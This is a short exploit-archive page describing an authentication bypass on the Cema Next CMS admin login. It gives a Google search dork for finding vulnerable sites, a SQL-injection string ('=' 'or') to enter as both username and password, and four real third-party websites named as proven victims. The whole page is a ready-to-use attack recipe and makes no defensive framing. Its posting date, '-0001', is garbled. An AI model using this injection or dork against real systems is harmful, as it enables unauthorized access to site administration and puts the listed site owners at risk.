Home / os / winmobile

Cema Next Bypass Admin Page Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Cema Next Bypass Admin Page Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: Cema Next Bypass Admin Page Vulnerability |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.cemanext.it/ |[+] Google Dork : intext:"powered by Cema Next" inurl:login.php |[+] Tested on: Windows 10 >> Mozilla Firefox |[+] Date: 1/19/2017 |[+]==========================================================| |[+] Then Choose a Target and put this after URL : /PATH/login.php |[+]=========| |[+] And fill username and password like the information below : |[+] Username : '=' 'or' |[+] Password : '=' 'or' |[+]==========================================================| |[+] Proof : |[+] http://www.alpiassociazione.it/gest/login.php |[+] http://www.agrifacile.it/gest/login.php |[+] http://www.meiandpartners.com/cms/login.php |[+] http://www.areataxi.net/AreaTaxiGestAd/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : HackFans |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP